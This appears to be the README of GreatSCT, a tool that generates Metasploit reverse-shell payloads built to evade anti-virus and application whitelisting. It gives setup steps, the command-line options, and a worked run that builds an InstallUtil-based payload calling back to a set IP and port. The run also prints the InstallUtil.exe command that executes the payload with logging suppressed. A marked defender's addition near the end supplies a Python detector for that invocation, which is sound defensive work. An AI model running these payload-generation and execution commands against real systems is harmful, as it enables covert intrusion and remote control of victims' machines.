GreatSCT is a tool designed to generate Metasploit payloads that bypass common anti-virus and application whitelisting solutions.
GreatSCT is currently supported by @ConsciousHacker.
Software Requirements:
Linux
- Kali - run the setup script - sudo ./setup.sh -c
NOTE: Support for distributions other than Kali Linux will be coming soon.
Setup (tl;dr)
NOTE: Installation must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.
Run ./setup.sh -c on Linux.
Install by cloning from git, not via apt!
Quick Install
apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c
Regenerating Config
NOTE: This must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.
Most of the time the config file at /etc/greatsct/settings.py will not need to be rebuilt, but in some cases you might be prompted to do so. The file is generated by config/update.py.
It is important that you are in the config/ directory before executing update.py. If you are not, settings.py will be incorrect and when you launch GreatSCT you will see the following.
Main Menu
0 payloads loaded
Don't panic. Enter the config/ dir and re-run update.py.
Example Usage
GreatSCT's Main Menu:
GreatSCT | [Version]: 1.0
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
Main Menu
1 tools loaded
Available Commands:
exit Exit GreatSCT
info Information on a specific tool
list List available tools
update Update GreatSCT
use Use a specific tool
Main menu choice:
Help
usage: GreatSCT.py [--update] [--version] [--list-tools] [-t Bypass] [--ip IP]
[--port Port] [--list-payloads]
[-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]]
[-o OUTPUT NAME] [-p [PAYLOAD]] [--clean]
[--msfoptions [OPTION=value [OPTION=value ...]]]
[--msfvenom [windows/meterpreter/reverse_tcp]]
GreatSCT is a framework to generate application whitelisting bypasses.
GreatSCT Options:
--update Update the GreatSCT framework.
--version Displays version and quits.
--list-tools List GreatSCT's tools
-t Bypass, --tool Bypass
Specify GreatSCT tool to use (Bypass)
Callback Settings:
--ip IP, --domain IP IP Address to connect back to
--port Port Port number to connect to.
[*] Payload Settings:
--list-payloads Lists all available payloads for that tool
Great Scott Options:
-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]
Custom payload module options.
-o OUTPUT NAME Output file base name for source and compiled
binaries.
-p [PAYLOAD] Payload to generate. Lists payloads if none specified.
--clean Clean out payload folders.
--msfoptions [OPTION=value [OPTION=value ...]]
Options for the specified metasploit payload.
--msfvenom [windows/meterpreter/reverse_tcp]
Metasploit shellcode to generate.
GreatSCT Bypass CLI
# ./GreatSCT.py --ip 192.168.157.136 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: installutil_powershell
[*] Payload Module: installutil/powershell/script
[*] Executable written to: /usr/share/greatsct-output/compiled/payload4.exe
[*] Source code written to: /usr/share/greatsct-output/source/payload4.cs
[*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload4.exe
#
# file /usr/share/greatsct-output/compiled/payload4.exe
/usr/share/greatsct-output/compiled/payload4.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
#
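A defender's view of the run above, as an added example that is not part of GreatSCT or its README: the printed InstallUtil.exe command line passes an empty /logfile= and /LogToConsole=false, so the run leaves neither an install log nor console output, and that combination can be searched for in process-creation telemetry. The event field names and sample records below are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Matches /key[=value] or -key[=value]; accepting "-" as a prefix is an assumption.
OPT = re.compile(r'(?:^|\s)[/-](?P<key>[A-Za-z]+)(?:=(?P<val>"[^"]*"|\S*))?')

def parse_options(cmdline):
    """Return {lowercased switch: value} for each switch on the command line."""
    return {m.group("key").lower(): (m.group("val") or "").strip('"')
            for m in OPT.finditer(cmdline)}

def suppresses_logging(event):
    """True when InstallUtil.exe runs with an empty /logfile= and /LogToConsole=false."""
    if basename(event["image"]).lower() != "installutil.exe":
        return False
    opts = parse_options(event["cmdline"])
    no_file_log = opts.get("logfile") == ""  # switch present, no file name given
    no_console = opts.get("logtoconsole", "").lower() == "false"
    return no_file_log and no_console

def flagged(events):
    """Indexes of the events that match the pattern."""
    return [i for i, e in enumerate(events) if suppresses_logging(e)]

NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
# Constructed process-creation records (hypothetical field names), not real telemetry.
SAMPLE_EVENTS = [
    # 0: the command line printed in the README output above
    {"image": NET, "cmdline": NET + " /logfile= /LogToConsole=false payload4.exe"},
    # 1: same switches, different case and prefix
    {"image": NET, "cmdline": r"installutil.exe -LOGFILE= -logtoconsole=FALSE C:\Users\Public\a.exe"},
    # 2: ordinary service install that keeps a log file
    {"image": NET, "cmdline": NET + r' /LogFile=C:\Logs\svc.log "C:\Program Files\Svc\Svc.exe"'},
    # 3: same switches on an unrelated binary
    {"image": r"C:\Tools\other.exe", "cmdline": r"other.exe /logfile= /LogToConsole=false"},
]

if __name__ == "__main__":
    for i in flagged(SAMPLE_EVENTS):
        print("suspicious InstallUtil invocation:", SAMPLE_EVENTS[i]["cmdline"])
```

Matching on the image name alone misses a renamed copy of InstallUtil.exe, so pair this with the original-file-name field where the telemetry source provides one.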
Credits
https://github.com/veil-Framework/
Licensing
This project is licensed under the GNU General Public License v3.